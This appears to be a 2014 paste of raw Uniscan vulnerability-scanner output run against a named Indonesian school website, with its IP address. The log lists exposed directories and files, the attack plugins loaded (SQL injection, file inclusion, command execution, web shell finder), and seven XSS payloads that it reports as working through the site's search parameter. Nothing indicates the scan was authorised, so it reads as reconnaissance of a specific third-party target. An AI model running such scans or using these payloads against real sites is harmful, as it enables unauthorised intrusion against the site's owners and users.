mickojavanese

Sep 2nd, 2014
root@javanese:~# uniscan -u http://smpnsata.sch.id/ -qweds
####################################
# Uniscan project #
# http://uniscan.sourceforge.net/ #
####################################
V. 6.2


Scan date: 2-9-2014 11:19:47
===================================================================================================
| Domain: http://smpnsata.sch.id/
| IP: 192.185.52.208
===================================================================================================
|
| Directory check:
| [+] CODE: 200 URL: http://smpnsata.sch.id/aaa/
| [+] CODE: 200 URL: http://smpnsata.sch.id/cpanel/
| [+] CODE: 200 URL: http://smpnsata.sch.id/feed/
| [+] CODE: 200 URL: http://smpnsata.sch.id/fe/
| [+] CODE: 200 URL: http://smpnsata.sch.id/head/
| [+] CODE: 200 URL: http://smpnsata.sch.id/ide/
| [+] CODE: 200 URL: http://smpnsata.sch.id/lang/
| [+] CODE: 200 URL: http://smpnsata.sch.id/lan/
| [+] CODE: 200 URL: http://smpnsata.sch.id/pe/
| [+] CODE: 200 URL: http://smpnsata.sch.id/pro/
| [+] CODE: 200 URL: http://smpnsata.sch.id/rss/
| [+] CODE: 200 URL: http://smpnsata.sch.id/rs/
| [+] CODE: 200 URL: http://smpnsata.sch.id/tips/
===================================================================================================
|
| File check:
| [+] CODE: 200 URL: http://smpnsata.sch.id/favicon.ico
| [+] CODE: 200 URL: http://smpnsata.sch.id/index.php
| [+] CODE: 200 URL: http://smpnsata.sch.id/license.txt
| [+] CODE: 200 URL: http://smpnsata.sch.id/mailman/listinfo
| [+] CODE: 200 URL: http://smpnsata.sch.id/readme.html
| [+] CODE: 200 URL: http://smpnsata.sch.id/robots.txt
| [+] CODE: 200 URL: http://smpnsata.sch.id/search/htx/sqlqhit.asp
| [+] CODE: 200 URL: http://smpnsata.sch.id/search/htx/SQLQHit.asp
| [+] CODE: 200 URL: http://smpnsata.sch.id/search/sqlqhit.asp
| [+] CODE: 200 URL: http://smpnsata.sch.id/search/SQLQHit.asp
| [+] CODE: 200 URL: http://smpnsata.sch.id/sitemap.xml
| [+] CODE: 200 URL: http://smpnsata.sch.id/xmlrpc.php
===================================================================================================
|
| Check robots.txt:
| [+] User-agent: *
| [+] Disallow: /wp-admin/
| [+] Disallow: /wp-includes/
| [+]
| [+] Sitemap: http://smpnsata.sch.id/sitemap.xml.gz
|
| Check sitemap.xml:
===================================================================================================
|
| Crawler Started:
| Plugin name: E-mail Detection v.1.1 Loaded.
| Plugin name: Code Disclosure v.1.1 Loaded.
| Plugin name: Web Backdoor Disclosure v.1.1 Loaded.
| Plugin name: Upload Form Detect v.1.1 Loaded.
| Plugin name: FCKeditor upload test v.1 Loaded.
| Plugin name: Timthumb <= 1.32 vulnerability v.1 Loaded.
| Plugin name: phpinfo() Disclosure v.1 Loaded.
| Plugin name: External Host Detect v.1.2 Loaded.
| [+] Crawling finished, 808 URL's found!
|
| E-mails:
|
| Source Code Disclosure:
|
| Web Backdoors:
|
| File Upload Forms:
|
| FCKeditor File Upload:
|
| Timthumb:
|
| PHPinfo() Disclosure:
|
| External hosts:
| [+] External Host Found: https://ssl.gstatic.com
| [+] External Host Found: http://codex.wordpress.org
| [+] External Host Found: http://www.mysql.com
| [+] External Host Found: http://www.gnu.org
| [+] External Host Found: http://php.net
| [+] External Host Found: https://wordpress.org
| [+] External Host Found: http://html5shim.googlecode.com
| [+] External Host Found: http://planet.wordpress.org
| [+] External Host Found: http://ajax.googleapis.com
| [+] External Host Found: http://httpd.apache.org
|
| Ignored Files:
===================================================================================================
| Dynamic tests:
| Plugin name: Learning New Directories v.1.2 Loaded.
| Plugin name: FCKedior tests v.1.1 Loaded.
| Plugin name: Timthumb <= 1.32 vulnerability v.1 Loaded.
| Plugin name: Find Backup Files v.1.2 Loaded.
| Plugin name: Blind SQL-injection tests v.1.3 Loaded.
| Plugin name: Local File Include tests v.1.1 Loaded.
| Plugin name: PHP CGI Argument Injection v.1.1 Loaded.
| Plugin name: Remote Command Execution tests v.1.1 Loaded.
| Plugin name: Remote File Include tests v.1.2 Loaded.
| Plugin name: SQL-injection tests v.1.2 Loaded.
| Plugin name: Cross-Site Scripting tests v.1.2 Loaded.
| Plugin name: Web Shell Finder v.1.3 Loaded.
| [+] 37 New directories added
|
|
| FCKeditor tests:
|
|
| Timthumb < 1.33 vulnerability:
|
|
| Backup Files:
| Skipped because http://smpnsata.sch.id/wp-content/themes/pendidikan/testing123 did not return the code 404
|
|
| Blind SQL Injection:
|
|
| Local File Include:
|
|
| PHP CGI Argument Injection:
|
|
| Remote Command Execution:
|
|
| Remote File Include:
|
|
| SQL Injection:
|
|
| Cross-Site Scripting (XSS):
| [+] Vul [XSS] http://smpnsata.sch.id/
| Post data: &s=<script>alert('XSS')</script>
| [+] Vul [XSS] http://smpnsata.sch.id/
| Post data: &s=<IMG SRC="javascript:alert('XSS');">
| [+] Vul [XSS] http://smpnsata.sch.id/
| Post data: &s=<META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert('XSS');">
| [+] Vul [XSS] http://smpnsata.sch.id/
| Post data: &s=<LINK REL="stylesheet" HREF="javascript:alert('XSS');">
| [+] Vul [XSS] http://smpnsata.sch.id/
| Post data: &s=<body onload="javascript:alert('XSS')"></body>
| [+] Vul [XSS] http://smpnsata.sch.id/
| Post data: &s=<DIV STYLE="background-image: url(javascript:alert('XSS'))">
| [+] Vul [XSS] http://smpnsata.sch.id/
| Post data: &s=<table background="javascript:alert('XSS')"></table>
|
|
| Web Shell Finder:
[*] Remaining tests: 8461